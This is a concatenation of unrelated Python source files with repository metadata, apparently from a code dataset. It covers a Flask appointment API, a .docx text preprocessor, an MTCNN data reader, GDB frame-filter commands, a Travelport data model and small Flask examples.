upcoming_appointments = []
for appointment in tutor.upcoming_appointments:
student = Student.query.get(appointment.student_id)
upcoming_appointments.append({
'Appointment ID': appointment.id,
"Student ID": appointment.student_id,
"Student name": student.name,
'Start Time': appointment.start_time,
'Duration in minutes': appointment.duration,
'confirmation': "Confirmed" if appointment.confirmation in (True, 't', 'True') else "Not Confirmed"
})
return jsonify({
'success': True,
'Total Appointments': len(appointments),
'Total of Upcoming Appointments': tutor.num_upcoming_appointments,
'Upcoming Appointments': upcoming_appointments
})
@app.route('/student/<int:student_id>/appointments', methods=['GET'])
def get_appointments_student(student_id):
student = Student.query.filter(Student.id == student_id).one_or_none()
if student is None:
abort(404)
else:
appointments = Appointments.query.filter(
Appointments.student_id == str(student_id)).all()
if len(appointments) == 0:
return jsonify({
'success': True,
'Total Appointments': len(appointments)
})
else:
upcoming_appointments = []
for appointment in student.upcoming_appointments:
tutor = Tutor.query.get(appointment.tutor_id)
upcoming_appointments.append({
'Appointment ID': appointment.id,
"Tutor ID": appointment.student_id,
"Tutor name": tutor.name,
'Start Time': appointment.start_time,
'Duration in minutes': appointment.duration,
'confirmation': "Confirmed" if appointment.confirmation in (True, 't', 'True') else "Not Confirmed"
})
return jsonify({
'success': True,
'Total Appointments': len(appointments),
'Total of Upcoming Appointments': student.num_upcoming_appointments,
'Upcoming Appointments': upcoming_appointments
})
#-------------------- POST Requests --------------------
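# A minimal sketch of the missing POST endpoint (assumptions: Appointments
# exposes an insert() helper analogous to the update() used in the PATCH
# handler below, and the JSON body carries the field names used by the GET
# handlers above).
@app.route('/appointments', methods=['POST'])
def create_appointment():
    body = request.get_json()
    if body is None:
        abort(400)
    try:
        appointment = Appointments(
            tutor_id=body.get('tutor_id'),
            student_id=body.get('student_id'),
            start_time=body.get('start_time'),
            duration=body.get('duration'),
            confirmation=False)
        appointment.insert()
        return jsonify({
            'success': True,
            'Appointment ID': appointment.id
        })
    except Exception:
        abort(422)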
#-------------------- PATCH Requests --------------------
@app.route("/appointments/edit/<int:appointment_id>", methods=['PATCH'])
def update_appointment(appointment_id):
appointment = Appointments.query.filter(Appointments.id == appointment_id).one_or_none()
if appointment is None:
abort(404)
else:
try:
body = request.get_json()
confirmation = body.get('confirmation')
appointment.confirmation = confirmation
appointment.update()
return jsonify({
'success': True,
'Appointment Confirmation': "Confirmed" if appointment.confirmation in (True, 't', 'True') else "Not Confirmed"
})
except:
abort(422)
if __name__ == '__main__':
app.run()
|
[
"sara.almuraytib@gmail.com"
] |
sara.almuraytib@gmail.com
|
1f7b7c84b648f677e41fb961d41caf32532e5770
|
369119ec54d3283fcea79f1c483ccf9d93269820
|
/processDocx.py
|
c05e2914cf5edcc035898764b5ef1bdad77a86c2
|
[] |
no_license
|
fafargamer/BackendAI
|
fe2d08a92c78f5e6975b610b52b4e91b73ea97a2
|
1450a1c6774f29c6363e4030c4892c90dd9b0a2e
|
refs/heads/master
| 2023-05-12T17:32:00.667538
| 2021-06-01T00:37:38
| 2021-06-01T00:37:38
| 370,993,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,597
|
py
|
import urllib
import spacy
import requests
import string
import docx
import io
import numpy as np
from nltk.tokenize import RegexpTokenizer
from string import digits
from docx import Document #pip install python-docx
import PyPDF2 #pip install PyPDF2
# import StopWordRemoverFactory class
from Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory, StopWordRemover, ArrayDictionary #pip install Sastrawi
from Sastrawi.Stemmer.StemmerFactory import StemmerFactory
from stopwords import more_stopword as more_St
from stopwords import extra_stopword as extra_St
from stopwords import konjungsi as konjungsi
factory = StopWordRemoverFactory()
# factoryStem = StemmerFactory()
# stopword = factory.create_stop_word_remover()
# stemmer = factoryStem.create_stemmer()
import re  # import the regular-expression module
# fetch the default (built-in) stopword list
stop_factory = StopWordRemoverFactory().get_stop_words()
# merge the stopword lists
data = stop_factory + more_St + konjungsi
dictionary = ArrayDictionary(data)
stopword = StopWordRemover(dictionary)
def processDocxParagraph(document):
# global texts
# document=requests.get(inputUrl, allow_redirects=True)
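    # NOTE (assumption): `document` arrives as a requests.Response (see the
    # commented-out requests.get above), so its raw bytes live in .content
    # and must be wrapped in BytesIO for python-docx.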
document=Document(io.BytesIO(document.content))
document.save('test.docx')
document = docx.Document('test.docx')
documentArray=[]
pureDocumentArray=[]
for paragraph in document.paragraphs:
if(len(paragraph.text)==1):
print(paragraph.text)
if(len(paragraph.text)>0 and paragraph.text != " "):
paragraph.text = paragraph.text.replace('\u2013', '-')
paragraph.text = paragraph.text.replace('\u00a0', '')
# newText = newText.replace('\u00a0', '')
documentArray.append(paragraph.text)
# pureDocumentArray.append(paragraph.text)
    # notes:
    # \u2013 = -  (en dash, replaced with a hyphen)
    # \u201c = "  (opening double quote)
    # \u201d = "  (closing double quote)
result = []
s=""
for i in range(len(documentArray)):
text = []
for j in range(len(documentArray[i])):
tokenizer = RegexpTokenizer(r'\w+')
textsTokenized=tokenizer.tokenize(documentArray[i][j])
if(len(textsTokenized) < 1):
textsTokenized = [' ']
text.append(textsTokenized[0])
textor = s.join(text)
textor = textor.lower()
textor = stopword.remove(textor)
# textor = stemmer.stem(textor)
textor = re.sub(r"\d+", "", textor)
result.append(textor)
dividedDocument = []
dividedPure = []
print('Document Processed')
divisor = 1
if len(result) > 255:
# print(len(result))
        # print('Document can be divided into 5')
document_split = np.array_split(result, int(len(result)/(divisor*64)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*64)))
print(document_split[0])
print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 127:
# print(len(result))
        # print('Document can be divided into 5')
document_split = np.array_split(result, int(len(result)/(divisor*32)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*32)))
print(document_split[0])
print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 63:
# print(len(result))
        # print('Document can be divided into 5')
document_split = np.array_split(result, int(len(result)/(divisor*16)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*16)))
print(document_split[0])
print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 31:
# print(len(result))
        # print('Document can be divided into 5')
document_split = np.array_split(result, int(len(result)/(divisor*8)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*8)))
# print(document_split[0])
# print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 15:
# print(len(result))
        # print('Document can be divided into 5')
document_split = np.array_split(result, int(len(result)/(divisor*4)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*4)))
print(document_split[0])
print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 7:
# print(len(result))
        # print('Document can be divided into 5')
document_split = np.array_split(result, int(len(result)/(divisor*2)))
        pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*2)))
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
return documentArray, result
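
# Sketch of a compact alternative to the threshold ladder above (not wired in;
# the thresholds 255/127/63/31/15/7 amount to requiring at least 4 chunks of
# each candidate size):
#
# def split_document(processed, pure, divisor=1):
#     for chunk in (64, 32, 16, 8, 4, 2):
#         if len(processed) >= 4 * chunk:
#             n = int(len(processed) / (divisor * chunk))
#             return ([' '.join(p) for p in np.array_split(processed, n)],
#                     [' '.join(p) for p in np.array_split(pure, n)])
#     return processed, pure  # too short to split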
|
[
"68151749+fafargamer@users.noreply.github.com"
] |
68151749+fafargamer@users.noreply.github.com
|
06acbf8dd5987d52c3b7c09269cc36980fb87b0a
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Projects/pyinstaller/build/lib/PyInstaller/hooks/hook-pyexcelerate.Writer.py
|
7ba728e75020705ce49da0686e9c8f3f40fcd2a6
|
[
"LicenseRef-scancode-other-permissive"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:4cc44e1f399e417bbb303f11e4f98452ec119f4f4a6763df9751bd47db29ba4e
size 679
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
a80b1f52ed5144212414ad8969adc627bb1ce950
|
17900afc933c192e6ce921c24fa0488a3ac98e6d
|
/reader_o_net.py
|
5d3c1fbbab79101e8ba855b7f1068caa51c95dad
|
[] |
no_license
|
JesseYang/MTCNN
|
210eb9223eb03b8044a0d22b4372aad376e45ccd
|
3ff697442181a16aad858433bcfee77a7012fd4a
|
refs/heads/master
| 2021-01-21T08:20:55.354279
| 2018-01-02T14:28:07
| 2018-01-02T14:28:07
| 101,959,647
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
import os, sys
import pdb
import pickle
import numpy as np
from scipy import misc
import random
import six
from six.moves import urllib, range
import copy
import logging
import cv2
from tensorpack import *
from cfgs.config import cfg
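
# Each line of the list file is expected to look like (MTCNN convention,
# inferred from the parsing below):
#   im_path flag [x1 y1 x2 y2] [lm_x1 lm_y1 ... lm_x5 lm_y5]
# where flag is 1 (positive), 0 (negative) or -1 (part face); bbox and
# landmark fields are zero-filled when absent.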
def get_img_list(text_file):
with open(text_file) as f:
content = f.readlines()
ret = [record.strip().split(' ') for record in content]
# pdb.set_trace()
filter_ret = []
for idx, ele in enumerate(ret):
im_path = ele[0]
# print(im_path)
if int(ele[1]) == -1:
flage = -1
if len(ele[2:]) < 7:
label = np.asarray([float(e) for e in ele[2: ]])
landmark = np.asarray([float(0) for e in range(0,10)])
else:
label = np.asarray([float(e) for e in ele[2:6]])
landmark = np.asarray([float(e) for e in ele[6: ]])
elif int(ele[1]) == 1:
flage = 1
if len(ele[2:]) < 7:
label = np.asarray([float(e) for e in ele[2: ]])
landmark = np.asarray([float(0) for e in range(0,10)])
else:
label = np.asarray([float(e) for e in ele[2:6]])
landmark = np.asarray([float(e) for e in ele[6: ]])
elif int(ele[1]) == 0:
flage = 0
label = np.asarray([float(0) for e in range(0,4)])
landmark = np.asarray([float(0) for e in range(0,10)])
filter_ret.append([im_path, flage, label, landmark])
return filter_ret
class Data(RNGDataFlow):
def __init__(self, filename_list, shuffle=True):
self.filename_list = filename_list
if isinstance(filename_list, list) == False:
filename_list = [filename_list]
self.imglist = []
for filename in filename_list:
self.imglist.extend(get_img_list(filename))
self.shuffle = shuffle
def size(self):
return len(self.imglist)
def get_data(self):
idxs = np.arange(len(self.imglist))
if self.shuffle:
self.rng.shuffle(idxs)
for k in idxs:
img_path, label, bbox, landmark = self.imglist[k]
if not os.path.isfile(img_path):
continue
img = misc.imread(img_path, mode='RGB')
# print(landmark)
img = cv2.resize(img, (cfg.img_size_48, cfg.img_size_48))
yield [img, label, bbox, landmark]
if __name__ == '__main__':
ds = Data(cfg.train_list)
# ds.reset_state()
# g = ds.get_data()
# dp = next(g)
# import pdb
# pdb.set_trace()
|
[
"jesse.yang1985@gmail.com"
] |
jesse.yang1985@gmail.com
|
786379d4c59694fe1c9f96f5d1cd36d9be7f5792
|
55540f3e86f1d5d86ef6b5d295a63518e274efe3
|
/toolchain/riscv/Darwin/share/gdb/python/gdb/command/frame_filters.py
|
fd7498fd144731c099fc14fc38755f8fb21e2f32
|
[
"Apache-2.0"
] |
permissive
|
bouffalolab/bl_iot_sdk
|
bc5eaf036b70f8c65dd389439062b169f8d09daa
|
b90664de0bd4c1897a9f1f5d9e360a9631d38b34
|
refs/heads/master
| 2023-08-31T03:38:03.369853
| 2023-08-16T08:50:33
| 2023-08-18T09:13:27
| 307,347,250
| 244
| 101
|
Apache-2.0
| 2023-08-28T06:29:02
| 2020-10-26T11:16:30
|
C
|
UTF-8
|
Python
| false
| false
| 16,256
|
py
|
# Frame-filter commands.
# Copyright (C) 2013-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""GDB commands for working with frame-filters."""
import sys
import gdb
import copy
from gdb.FrameIterator import FrameIterator
from gdb.FrameDecorator import FrameDecorator
import gdb.frames
import itertools
# GDB Commands.
class SetFilterPrefixCmd(gdb.Command):
"""Prefix command for 'set' frame-filter related operations."""
def __init__(self):
super(SetFilterPrefixCmd, self).__init__("set frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class ShowFilterPrefixCmd(gdb.Command):
"""Prefix command for 'show' frame-filter related operations."""
def __init__(self):
super(ShowFilterPrefixCmd, self).__init__("show frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class InfoFrameFilter(gdb.Command):
"""List all registered Python frame-filters.
Usage: info frame-filters"""
def __init__(self):
super(InfoFrameFilter, self).__init__("info frame-filter",
gdb.COMMAND_DATA)
@staticmethod
def enabled_string(state):
"""Return "Yes" if filter is enabled, otherwise "No"."""
if state:
return "Yes"
else:
return "No"
def print_list(self, title, frame_filters, blank_line):
sorted_frame_filters = sorted(frame_filters.items(),
key=lambda i: gdb.frames.get_priority(i[1]),
reverse=True)
if len(sorted_frame_filters) == 0:
return 0
print(title)
print(" Priority Enabled Name")
for frame_filter in sorted_frame_filters:
name = frame_filter[0]
try:
priority = '{:<8}'.format(
str(gdb.frames.get_priority(frame_filter[1])))
enabled = '{:<7}'.format(
self.enabled_string(gdb.frames.get_enabled(frame_filter[1])))
print(" %s %s %s" % (priority, enabled, name))
except Exception:
e = sys.exc_info()[1]
print(" Error printing filter '"+name+"': "+str(e))
if blank_line:
print("")
return 1
def invoke(self, arg, from_tty):
any_printed = self.print_list("global frame-filters:", gdb.frame_filters, True)
cp = gdb.current_progspace()
any_printed += self.print_list("progspace %s frame-filters:" % cp.filename,
cp.frame_filters, True)
for objfile in gdb.objfiles():
any_printed += self.print_list("objfile %s frame-filters:" % objfile.filename,
objfile.frame_filters, False)
if any_printed == 0:
print ("No frame filters.")
# Internal enable/disable functions.
def _enable_parse_arg(cmd_name, arg):
""" Internal worker function to take an argument from
enable/disable and return a tuple of arguments.
Arguments:
cmd_name: Name of the command invoking this function.
args: The argument as a string.
Returns:
A tuple containing the dictionary, and the argument, or just
the dictionary in the case of "all".
"""
    argv = gdb.string_to_argv(arg)
argc = len(argv)
if argc == 0:
raise gdb.GdbError(cmd_name + " requires an argument")
if argv[0] == "all":
if argc > 1:
raise gdb.GdbError(cmd_name + ": with 'all' " \
"you may not specify a filter.")
elif argc != 2:
raise gdb.GdbError(cmd_name + " takes exactly two arguments.")
return argv
def _do_enable_frame_filter(command_tuple, flag):
"""Worker for enabling/disabling frame_filters.
Arguments:
command_type: A tuple with the first element being the
frame filter dictionary, and the second being
the frame filter name.
flag: True for Enable, False for Disable.
"""
list_op = command_tuple[0]
op_list = gdb.frames.return_list(list_op)
if list_op == "all":
for item in op_list:
gdb.frames.set_enabled(item, flag)
else:
frame_filter = command_tuple[1]
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(frame_filter) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_enabled(ff, flag)
def _complete_frame_filter_list(text, word, all_flag):
"""Worker for frame filter dictionary name completion.
Arguments:
text: The full text of the command line.
word: The most recent word of the command line.
all_flag: Whether to include the word "all" in completion.
Returns:
A list of suggested frame filter dictionary name completions
from text/word analysis. This list can be empty when there
are no suggestions for completion.
"""
    if all_flag:
filter_locations = ["all", "global", "progspace"]
else:
filter_locations = ["global", "progspace"]
for objfile in gdb.objfiles():
filter_locations.append(objfile.filename)
# If the user just asked for completions with no completion
# hints, just return all the frame filter dictionaries we know
# about.
if (text == ""):
return filter_locations
# Otherwise filter on what we know.
    flist = [x for x in filter_locations if x.startswith(text)]  # a real list, so len()/indexing below work on Python 3 too
# If we only have one completion, complete it and return it.
if len(flist) == 1:
flist[0] = flist[0][len(text)-len(word):]
# Otherwise, return an empty list, or a list of frame filter
# dictionaries that the previous filter operation returned.
return flist
def _complete_frame_filter_name(word, printer_dict):
"""Worker for frame filter name completion.
Arguments:
word: The most recent word of the command line.
printer_dict: The frame filter dictionary to search for frame
filter name completions.
Returns: A list of suggested frame filter name completions
from word analysis of the frame filter dictionary. This list
can be empty when there are no suggestions for completion.
"""
    printer_keys = list(printer_dict.keys())
if (word == ""):
return printer_keys
    flist = [x for x in printer_keys if x.startswith(word)]
return flist
class EnableFrameFilter(gdb.Command):
"""GDB command to enable the specified frame-filter.
Usage: enable frame-filter DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of an "objfile" -- a shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(EnableFrameFilter, self).__init__("enable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("enable frame-filter", arg)
_do_enable_frame_filter(command_tuple, True)
class DisableFrameFilter(gdb.Command):
"""GDB command to disable the specified frame-filter.
Usage: disable frame-filter DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of an "objfile" -- a shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(DisableFrameFilter, self).__init__("disable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("disable frame-filter", arg)
_do_enable_frame_filter(command_tuple, False)
class SetFrameFilterPriority(gdb.Command):
"""GDB command to set the priority of the specified frame-filter.
Usage: set frame-filter priority DICTIONARY NAME PRIORITY
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of an "objfile" -- a
shared library or an executable.
NAME matches the name of the frame filter to operate on.
PRIORITY is the an integer to assign the new priority to the frame
filter."""
def __init__(self):
super(SetFrameFilterPriority, self).__init__("set frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a priority from a tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, name and priority from
the arguments.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
        argv = gdb.string_to_argv(arg)
argc = len(argv)
if argc != 3:
print("set frame-filter priority " \
"takes exactly three arguments.")
return None
return argv
def _set_filter_priority(self, command_tuple):
"""Internal worker for setting priority of frame-filters, by
parsing a tuple and calling _set_priority with the parsed
tuple.
Arguments:
command_tuple: Tuple which contains the arguments from the
command.
"""
list_op = command_tuple[0]
frame_filter = command_tuple[1]
# GDB returns arguments as a string, so convert priority to
# a number.
priority = int(command_tuple[2])
op_list = gdb.frames.return_list(list_op)
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(frame_filter) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_priority(ff, priority)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
        if command_tuple is not None:
self._set_filter_priority(command_tuple)
class ShowFrameFilterPriority(gdb.Command):
"""GDB command to show the priority of the specified frame-filter.
Usage: show frame-filter priority DICTIONARY NAME
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of an "objfile" -- a
shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(ShowFrameFilterPriority, self).__init__("show frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a dictionary and name from a
tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, and frame filter name.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
        argv = gdb.string_to_argv(arg)
argc = len(argv)
if argc != 2:
print("show frame-filter priority " \
"takes exactly two arguments.")
return None
return argv
def get_filter_priority(self, frame_filters, name):
"""Worker for retrieving the priority of frame_filters.
Arguments:
frame_filters: Name of frame filter dictionary.
name: object to select printers.
Returns:
The priority of the frame filter.
Raises:
gdb.GdbError: A frame filter cannot be found.
"""
op_list = gdb.frames.return_list(frame_filters)
try:
ff = op_list[name]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
return gdb.frames.get_priority(ff)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
            printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
        if command_tuple is None:
return
filter_name = command_tuple[1]
list_name = command_tuple[0]
try:
            priority = self.get_filter_priority(list_name, filter_name)
        except Exception:
            e = sys.exc_info()[1]
            print("Error printing filter priority for '"+filter_name+"': "+str(e))
else:
print("Priority of filter '" + filter_name + "' in list '" \
+ list_name + "' is: " + str(priority))
# Register commands
SetFilterPrefixCmd()
ShowFilterPrefixCmd()
InfoFrameFilter()
EnableFrameFilter()
DisableFrameFilter()
SetFrameFilterPriority()
ShowFrameFilterPriority()
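
# Example (sketch): a trivial pass-through frame filter that the commands
# above can list, enable/disable and re-prioritise.  The name/priority/enabled
# attributes plus a filter() method are the interface GDB expects; adding the
# object to gdb.frame_filters registers it as a "global" filter.
#
# class PassthroughFilter(object):
#     def __init__(self):
#         self.name = "passthrough"
#         self.priority = 100
#         self.enabled = True
#         gdb.frame_filters[self.name] = self
#
#     def filter(self, frame_iter):
#         return frame_iter
#
# PassthroughFilter()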
|
[
"jczhang@bouffalolab.com"
] |
jczhang@bouffalolab.com
|
9589822d526ae5e14200c84b3998d7219995c189
|
783f6e7f10bc1b78c5d79f67db2cc083afdbc651
|
/flask_task/day01flask简介/预习/day41_flask(原来上课代码大家可以参考和上面的笔记)/app2.py
|
2cf3f5177ce4a38b067c17b47313548207223ea2
|
[] |
no_license
|
GoodPhilipShi/flask_test
|
da72886f095a1af2588697966ea68069bb3e123c
|
e6399f1364adbc2c19e9395efe33fb3dd1262e99
|
refs/heads/master
| 2023-03-27T01:43:20.834175
| 2020-08-07T08:59:40
| 2020-08-07T08:59:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 516
|
py
|
from flask import Flask
# create the Flask application object
app = Flask(__name__)
app.config.from_pyfile('settings.py')
# route + view function
@app.route('/')
def hello_world():  # ----> view function
return 'HELLO hello world!hello kitty!'
@app.route('/abc',endpoint='abc1')
def show_abc():
return '<h1>abc</h1>'
# route simply decorates the function with add_url_rule
def show_name():
return '千锋教育'
app.add_url_rule('/name', view_func=show_name)
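# equivalent decorator form (what @app.route does under the hood):
# @app.route('/name')
# def show_name():
#     ...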
if __name__ == '__main__':
    # start flask
app.run()
|
[
"jasonboy0526@gmail.com"
] |
jasonboy0526@gmail.com
|
0111022712207e73557db11daa4c215b62aa68f5
|
9edaf93c833ba90ae9a903aa3c44c407a7e55198
|
/travelport/models/provider_reservation_status.py
|
e289bb70dc7b7eab923ad8cfe1af2b88069fce75
|
[] |
no_license
|
tefra/xsdata-samples
|
c50aab4828b8c7c4448dbdab9c67d1ebc519e292
|
ef027fe02e6a075d8ed676c86a80e9647d944571
|
refs/heads/main
| 2023-08-14T10:31:12.152696
| 2023-07-25T18:01:22
| 2023-07-25T18:01:22
| 222,543,692
| 6
| 1
| null | 2023-06-25T07:21:04
| 2019-11-18T21:00:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,532
|
py
|
from __future__ import annotations
from dataclasses import dataclass, field
from xsdata.models.datatype import XmlDate, XmlDateTime
from travelport.models.type_result_message_1 import TypeResultMessage1
__NAMESPACE__ = "http://www.travelport.com/schema/universal_v52_0"
@dataclass
class ProviderReservationStatus:
"""
Status of the cancellation for this provider reservation.
Parameters
----------
cancel_info
        If the provider reservation was not successfully cancelled, or was
        cancelled with warnings, the provider system may provide some
        textual information describing the reason.
create_date
The date and time that this reservation was created.
modified_date
The date and time that this reservation was last modified for any
reason.
provider_code
Contains the Provider Code of the entity housing the actual
reservation in the event this is a passive one.
locator_code
Contains the Locator Code of the actual reservation in the event
this is a passive reservation.
cancelled
        Will be true if the reservation was successfully cancelled on the
provider system.
"""
class Meta:
namespace = "http://www.travelport.com/schema/universal_v52_0"
cancel_info: None | TypeResultMessage1 = field(
default=None,
metadata={
"name": "CancelInfo",
"type": "Element",
}
)
create_date: None | XmlDateTime = field(
default=None,
metadata={
"name": "CreateDate",
"type": "Attribute",
"required": True,
}
)
modified_date: None | XmlDateTime = field(
default=None,
metadata={
"name": "ModifiedDate",
"type": "Attribute",
"required": True,
}
)
provider_code: None | str = field(
default=None,
metadata={
"name": "ProviderCode",
"type": "Attribute",
"required": True,
"min_length": 2,
"max_length": 5,
}
)
locator_code: None | str = field(
default=None,
metadata={
"name": "LocatorCode",
"type": "Attribute",
"required": True,
"max_length": 15,
}
)
cancelled: None | bool = field(
default=None,
metadata={
"name": "Cancelled",
"type": "Attribute",
"required": True,
}
)
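
# Usage sketch (assumption: parsing with the xsdata runtime that generated
# these models):
#
#     from xsdata.formats.dataclass.parsers import XmlParser
#     status = XmlParser().from_string(xml_text, ProviderReservationStatus)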
|
[
"chris@komposta.net"
] |
chris@komposta.net
|
6d2d12eec92a60acc5c530dee543f444ce6775e6
|
ef7a7397c1f3b07e48619c67f06016cdafd44ee0
|
/services/resources/sion/form.py
|
16e719e6aed2714e4c0e5f63526c0f8915207371
|
[] |
no_license
|
komangsu/sion-automation
|
a5ec4931fd8a08975e2d24d38b2723b0927a9b8f
|
14087311c1045518ce9efcc67ac26642a682da48
|
refs/heads/master
| 2022-06-10T14:43:59.745367
| 2020-05-07T05:44:31
| 2020-05-07T05:44:31
| 261,810,790
| 0
| 0
| null | 2020-05-06T16:03:23
| 2020-05-06T16:03:22
| null |
UTF-8
|
Python
| false
| false
| 496
|
py
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, RadioField
from wtforms.validators import DataRequired, Length
class SionForm(FlaskForm):
nim = StringField('Nim',validators=[DataRequired(),Length(min=3,max=10)])
password = PasswordField('Password',validators=[DataRequired(),Length(min=3)])
    harapan = RadioField("Expectations for all courses?", choices=[('1', '1'), ('-1', '-1')], validators=[DataRequired()])
submit = SubmitField('Submit')
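
# Minimal usage sketch (hypothetical view; assumes app.config['SECRET_KEY']
# is set so the form's CSRF protection works):
#
#     @app.route('/login', methods=['GET', 'POST'])
#     def login():
#         form = SionForm()
#         if form.validate_on_submit():
#             run_sion(form.nim.data, form.password.data)  # hypothetical helper
#         return render_template('login.html', form=form)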
|
[
"nyomanpradipta120@gmail.com"
] |
nyomanpradipta120@gmail.com
|